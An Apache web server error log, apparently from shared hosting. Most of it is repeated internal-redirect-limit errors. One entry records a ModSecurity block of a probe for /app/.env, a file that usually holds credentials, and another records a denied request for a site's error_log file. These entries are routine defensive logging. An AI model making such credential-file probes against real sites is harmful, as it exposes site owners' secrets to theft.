[Tue May 12 04:35:51.682096 2026] [core:error] [pid 1730175:tid 1730183] [client 52.141.35.48:9733] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:51.682127 2026] [core:error] [pid 1730175:tid 1730183] [client 52.141.35.48:9733] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:52.402217 2026] [core:error] [pid 1808852:tid 1808873] [client 52.141.35.48:13344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:52.402248 2026] [core:error] [pid 1808852:tid 1808873] [client 52.141.35.48:13344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:53.121074 2026] [core:error] [pid 1730175:tid 1730179] [client 52.141.35.48:9766] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:53.121100 2026] [core:error] [pid 1730175:tid 1730179] [client 52.141.35.48:9766] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:53.854541 2026] [core:error] [pid 1820198:tid 1820201] [client 52.141.35.48:14724] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:53.854570 2026] [core:error] [pid 1820198:tid 1820201] [client 52.141.35.48:14724] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:54.556362 2026] [core:error] [pid 1820198:tid 1820202] [client 52.141.35.48:3743] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:54.556395 2026] [core:error] [pid 1820198:tid 1820202] [client 52.141.35.48:3743] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:55.260873 2026] [core:error] [pid 1820198:tid 1820212] [client 52.141.35.48:13320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:55.260914 2026] [core:error] [pid 1820198:tid 1820212] [client 52.141.35.48:13320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:56.021763 2026] [core:error] [pid 1820198:tid 1820206] [client 52.141.35.48:13317] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:56.021792 2026] [core:error] [pid 1820198:tid 1820206] [client 52.141.35.48:13317] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:56.731611 2026] [core:error] [pid 1730207:tid 1730215] [client 52.141.35.48:3842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:56.731648 2026] [core:error] [pid 1730207:tid 1730215] [client 52.141.35.48:3842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:57.459285 2026] [core:error] [pid 1730207:tid 1730227] [client 52.141.35.48:9731] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:57.459326 2026] [core:error] [pid 1730207:tid 1730227] [client 52.141.35.48:9731] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:58.215949 2026] [core:error] [pid 1820198:tid 1820210] [client 52.141.35.48:14731] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:58.215982 2026] [core:error] [pid 1820198:tid 1820210] [client 52.141.35.48:14731] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:58.976810 2026] [core:error] [pid 1820198:tid 1820208] [client 52.141.35.48:14739] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:58.976840 2026] [core:error] [pid 1820198:tid 1820208] [client 52.141.35.48:14739] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:59.678645 2026] [core:error] [pid 1820198:tid 1820209] [client 52.141.35.48:3849] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:59.678677 2026] [core:error] [pid 1820198:tid 1820209] [client 52.141.35.48:3849] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:00.386238 2026] [core:error] [pid 1808852:tid 1808877] [client 52.141.35.48:3775] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:00.386272 2026] [core:error] [pid 1808852:tid 1808877] [client 52.141.35.48:3775] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:01.142222 2026] [core:error] [pid 1820198:tid 1820211] [client 52.141.35.48:14762] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:01.142252 2026] [core:error] [pid 1820198:tid 1820211] [client 52.141.35.48:14762] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:02.748541 2026] [core:error] [pid 1730207:tid 1730221] [client 52.141.35.48:14729] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:02.748573 2026] [core:error] [pid 1730207:tid 1730221] [client 52.141.35.48:14729] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:02.836765 2026] [security2:error] [pid 1820198:tid 1820207] [client 176.65.139.235:60372] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agKSEs1tk6y7yBJLpJooKgAAAIc"]
[Tue May 12 04:36:02.837000 2026] [security2:error] [pid 1820198:tid 1820207] [client 176.65.139.235:60372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agKSEs1tk6y7yBJLpJooKgAAAIc"]
[Tue May 12 04:36:02.837232 2026] [security2:error] [pid 1820198:tid 1820207] [client 176.65.139.235:60372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agKSEs1tk6y7yBJLpJooKgAAAIc"]
[Tue May 12 04:36:03.455955 2026] [core:error] [pid 1730207:tid 1730224] [client 52.141.35.48:3723] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:03.456005 2026] [core:error] [pid 1730207:tid 1730224] [client 52.141.35.48:3723] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:04.157912 2026] [core:error] [pid 1808852:tid 1808865] [client 52.141.35.48:3847] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:04.157946 2026] [core:error] [pid 1808852:tid 1808865] [client 52.141.35.48:3847] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:04.865221 2026] [core:error] [pid 1808852:tid 1808856] [client 52.141.35.48:3768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:04.865250 2026] [core:error] [pid 1808852:tid 1808856] [client 52.141.35.48:3768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:05.567006 2026] [core:error] [pid 1730175:tid 1730193] [client 52.141.35.48:14747] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:05.567032 2026] [core:error] [pid 1730175:tid 1730193] [client 52.141.35.48:14747] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:06.314080 2026] [core:error] [pid 1820198:tid 1820203] [client 52.141.35.48:14434] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:06.314115 2026] [core:error] [pid 1820198:tid 1820203] [client 52.141.35.48:14434] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:07.058125 2026] [core:error] [pid 1730207:tid 1730226] [client 52.141.35.48:3854] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:07.058157 2026] [core:error] [pid 1730207:tid 1730226] [client 52.141.35.48:3854] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:07.763585 2026] [core:error] [pid 1730175:tid 1730178] [client 52.141.35.48:3746] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:07.763616 2026] [core:error] [pid 1730175:tid 1730178] [client 52.141.35.48:3746] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:08.464085 2026] [core:error] [pid 1730207:tid 1730228] [client 52.141.35.48:3719] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:08.464118 2026] [core:error] [pid 1730207:tid 1730228] [client 52.141.35.48:3719] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:09.168546 2026] [core:error] [pid 1820198:tid 1820204] [client 52.141.35.48:14776] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:09.168579 2026] [core:error] [pid 1820198:tid 1820204] [client 52.141.35.48:14776] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:09.511460 2026] [autoindex:error] [pid 1730175:tid 1730183] [client 51.68.107.137:9837] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 04:36:09.869185 2026] [core:error] [pid 1808852:tid 1808864] [client 52.141.35.48:14766] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:09.869217 2026] [core:error] [pid 1808852:tid 1808864] [client 52.141.35.48:14766] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:10.574279 2026] [core:error] [pid 1808852:tid 1808873] [client 52.141.35.48:14721] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:10.574308 2026] [core:error] [pid 1808852:tid 1808873] [client 52.141.35.48:14721] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:11.374358 2026] [core:error] [pid 1730207:tid 1730233] [client 52.141.35.48:3153] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:11.374392 2026] [core:error] [pid 1730207:tid 1730233] [client 52.141.35.48:3153] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:12.163880 2026] [core:error] [pid 1820198:tid 1820212] [client 52.141.35.48:3169] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:12.163920 2026] [core:error] [pid 1820198:tid 1820212] [client 52.141.35.48:3169] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:12.923237 2026] [core:error] [pid 1808852:tid 1808879] [client 52.141.35.48:3145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:12.923262 2026] [core:error] [pid 1808852:tid 1808879] [client 52.141.35.48:3145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:13.702112 2026] [core:error] [pid 1730175:tid 1730189] [client 52.141.35.48:3871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:13.702146 2026] [core:error] [pid 1730175:tid 1730189] [client 52.141.35.48:3871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:14.429284 2026] [core:error] [pid 1808852:tid 1808856] [client 52.141.35.48:3168] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:14.429310 2026] [core:error] [pid 1808852:tid 1808856] [client 52.141.35.48:3168] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:15.170523 2026] [core:error] [pid 1808852:tid 1808858] [client 52.141.35.48:14728] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:15.170552 2026] [core:error] [pid 1808852:tid 1808858] [client 52.141.35.48:14728] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:15.949339 2026] [core:error] [pid 1808852:tid 1808874] [client 52.141.35.48:12806] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:15.949371 2026] [core:error] [pid 1808852:tid 1808874] [client 52.141.35.48:12806] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:16.733117 2026] [core:error] [pid 1808852:tid 1808871] [client 52.141.35.48:3869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:16.733154 2026] [core:error] [pid 1808852:tid 1808871] [client 52.141.35.48:3869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:17.466011 2026] [core:error] [pid 1808852:tid 1808855] [client 52.141.35.48:3854] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:17.466042 2026] [core:error] [pid 1808852:tid 1808855] [client 52.141.35.48:3854] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:18.166231 2026] [core:error] [pid 1820198:tid 1820223] [client 52.141.35.48:3864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:18.166264 2026] [core:error] [pid 1820198:tid 1820223] [client 52.141.35.48:3864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:18.943744 2026] [core:error] [pid 1730175:tid 1730179] [client 52.141.35.48:14774] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:18.943799 2026] [core:error] [pid 1730175:tid 1730179] [client 52.141.35.48:14774] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:19.712951 2026] [core:error] [pid 1730175:tid 1730190] [client 52.141.35.48:12855] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:19.712979 2026] [core:error] [pid 1730175:tid 1730190] [client 52.141.35.48:12855] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:20.447407 2026] [core:error] [pid 1808852:tid 1808866] [client 52.141.35.48:12837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:20.447439 2026] [core:error] [pid 1808852:tid 1808866] [client 52.141.35.48:12837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:21.147146 2026] [core:error] [pid 1808852:tid 1808869] [client 52.141.35.48:14415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:21.147174 2026] [core:error] [pid 1808852:tid 1808869] [client 52.141.35.48:14415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:21.854503 2026] [core:error] [pid 1820198:tid 1820214] [client 52.141.35.48:14447] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:21.854536 2026] [core:error] [pid 1820198:tid 1820214] [client 52.141.35.48:14447] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:22.571798 2026] [core:error] [pid 1730207:tid 1730220] [client 52.141.35.48:14413] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:22.571825 2026] [core:error] [pid 1730207:tid 1730220] [client 52.141.35.48:14413] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:23.324174 2026] [core:error] [pid 1730175:tid 1730184] [client 52.141.35.48:3850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:23.324203 2026] [core:error] [pid 1730175:tid 1730184] [client 52.141.35.48:3850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:24.066264 2026] [core:error] [pid 1730175:tid 1730194] [client 52.141.35.48:12802] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:24.066299 2026] [core:error] [pid 1730175:tid 1730194] [client 52.141.35.48:12802] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:24.807047 2026] [core:error] [pid 1820198:tid 1820213] [client 52.141.35.48:14426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:24.807072 2026] [core:error] [pid 1820198:tid 1820213] [client 52.141.35.48:14426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:25.542822 2026] [core:error] [pid 1730175:tid 1730180] [client 52.141.35.48:12848] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:25.542857 2026] [core:error] [pid 1730175:tid 1730180] [client 52.141.35.48:12848] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:26.330868 2026] [core:error] [pid 1808852:tid 1808877] [client 52.141.35.48:12823] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:26.330903 2026] [core:error] [pid 1808852:tid 1808877] [client 52.141.35.48:12823] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:27.059102 2026] [core:error] [pid 1808852:tid 1808861] [client 52.141.35.48:3863] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:27.059127 2026] [core:error] [pid 1808852:tid 1808861] [client 52.141.35.48:3863] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:27.821158 2026] [core:error] [pid 1808852:tid 1808872] [client 52.141.35.48:3819] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:27.821197 2026] [core:error] [pid 1808852:tid 1808872] [client 52.141.35.48:3819] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:28.550077 2026] [core:error] [pid 1808852:tid 1808870] [client 52.141.35.48:3776] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:28.550110 2026] [core:error] [pid 1808852:tid 1808870] [client 52.141.35.48:3776] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:28.947331 2026] [authz_core:error] [pid 1730207:tid 1730224] [client 176.120.22.46:55919] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/error_log, referer: https://www.maelbailly.fr/wp-includes/
[Tue May 12 04:36:29.256509 2026] [core:error] [pid 1820198:tid 1820217] [client 52.141.35.48:3846] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
